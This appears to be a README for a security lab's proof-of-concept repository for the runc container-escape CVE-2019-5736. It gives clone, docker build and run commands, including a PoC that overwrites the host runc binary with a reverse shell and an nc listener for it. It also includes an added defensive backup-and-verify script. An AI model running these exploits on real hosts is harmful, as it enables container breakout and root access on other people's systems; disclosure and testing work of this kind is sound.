sh0wrun/RunC-CVE-2019-5736

RunC-CVE-2019-5736

Two PoCs for CVE-2019-5736. See Twistlock Labs for an explanation of CVE-2019-5736 and the PoCs.

The malicious image PoC is heavily based on q3k’s PoC, so all credit goes to him.

Running the PoCs

Note that running the PoCs will overwrite the runc binary on the host. It is recommended that you create a copy of your runc binary (commonly at /usr/sbin/runc) before running one of the PoCs.
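
One way to take that copy and to confirm afterwards whether the host binary was changed, as an added example that is not part of the original repository. The function names and the default backup directory are assumptions, the runc path is the one named above, and `sha256sum` from GNU coreutils is assumed to be installed.

```shell
#!/bin/sh
# Added example: snapshot, verify and restore the runc binary around a PoC run.
# RUNC_PATH defaults to the location the README names; BACKUP_DIR is an assumed path.
RUNC_PATH="${RUNC_PATH:-/usr/sbin/runc}"
BACKUP_DIR="${BACKUP_DIR:-/var/backups/runc-poc}"

# runc_backup <binary> <backup_dir>
# Copy the binary aside (mode and timestamps preserved) and record its SHA-256.
runc_backup() {
    [ -f "$1" ] || { echo "no such file: $1" >&2; return 2; }
    mkdir -p "$2" || return 2
    cp -p "$1" "$2/runc.orig" || return 2
    sha256sum "$2/runc.orig" | cut -d' ' -f1 > "$2/runc.sha256"
}

# runc_verify <binary> <backup_dir>
# 0 = binary matches the recorded hash, 1 = modified or missing, 2 = no baseline.
runc_verify() {
    [ -f "$2/runc.sha256" ] || { echo "no baseline in $2" >&2; return 2; }
    [ -f "$1" ] || return 1
    [ "$(cat "$2/runc.sha256")" = "$(sha256sum "$1" | cut -d' ' -f1)" ]
}

# runc_restore <binary> <backup_dir>
# Check the saved copy against its own hash first, then replace the binary
# via a rename in the same directory so no half-written file is left behind.
runc_restore() {
    runc_verify "$2/runc.orig" "$2" || { echo "backup is damaged" >&2; return 2; }
    cp -p "$2/runc.orig" "$1.restore.$$" && mv -f "$1.restore.$$" "$1"
}

# Usage (as root): ./runc-guard.sh backup | verify | restore
case "${1:-}" in
    backup|verify|restore) "runc_$1" "$RUNC_PATH" "$BACKUP_DIR" ;;
esac
```

Run `backup` before a PoC, `verify` after it (exit status 1 means the binary no longer matches the baseline), and `restore` to put the original back.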

Clone the repository:

$ git clone https://github.com/twistlock/RunC-CVE-2019-5736

Exec PoC

Overwrites runc with a simple program that prints a string.

Running the exec PoC:

$ cd RunC-CVE-2019-5736 
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash

Malicious Image PoC

Overwrites runc with a simple reverse shell bash script that connects to localhost:2345.

Listen for the reverse shell:

$ nc -nvlp 2345

From a different shell, run the malicious image PoC:

$ cd RunC-CVE-2019-5736 
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC
